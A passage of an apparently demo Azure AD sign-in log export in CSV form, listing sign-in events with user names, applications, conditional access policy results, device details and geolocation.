{'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",41cc5746-ae7e-445a-962a-17f63c641400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41cc5746-ae7e-445a-962a-17f63c641400,SigninLogs,Sucess,41.90428925,-85.99833679
+952,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:45.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,607f7d69-ee50-494f-b53f-16f3c1a0fe54,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",41cc5746-ae7e-445a-962a-17f66b651400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41cc5746-ae7e-445a-962a-17f66b651400,SigninLogs,Sucess,41.90428925,-85.99833679
+953,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:49.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,65bcc17b-9599-4989-b2d4-b2ff3db31eb2,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",41cc5746-ae7e-445a-962a-17f608661400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41cc5746-ae7e-445a-962a-17f608661400,SigninLogs,Sucess,41.90428925,-85.99833679
+954,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:11.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fe45728-a311-46a8-88e6-15da95570bfe,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f8c71dc9-cc0d-48fb-832c-2ed8fd001300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f8c71dc9-cc0d-48fb-832c-2ed8fd001300,SigninLogs,Sucess,41.90428925,-85.99833679
+955,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:10.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",ec6285b1-71d9-466f-b960-3898cf771e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ec6285b1-71d9-466f-b960-3898cf771e00,SigninLogs,Sucess,47.47483063,-122.1431198
+956,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5acf9f1d-cdb3-4cdc-929a-dd99399dc574,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",67310a2e-a313-4902-99ba-eeb285441500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,67310a2e-a313-4902-99ba-eeb285441500,SigninLogs,Sucess,36.6404686,-78.26995087
+957,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:53.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,161ee6d6-0670-4323-98cc-291717e1c049,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",6849a433-22b7-4af4-99c8-beee30591500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6849a433-22b7-4af4-99c8-beee30591500,SigninLogs,Failed,33.7984581,-84.38828278
+958,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,c5413038-ad63-4595-9099-1bd7f5066e4a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c0245186-29e3-436a-add4-db4970b81300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0245186-29e3-436a-add4-db4970b81300,SigninLogs,Failed,41.90428925,-85.99833679
+959,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6101ddd5-b5c1-40c1-a92d-59853153caf7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': 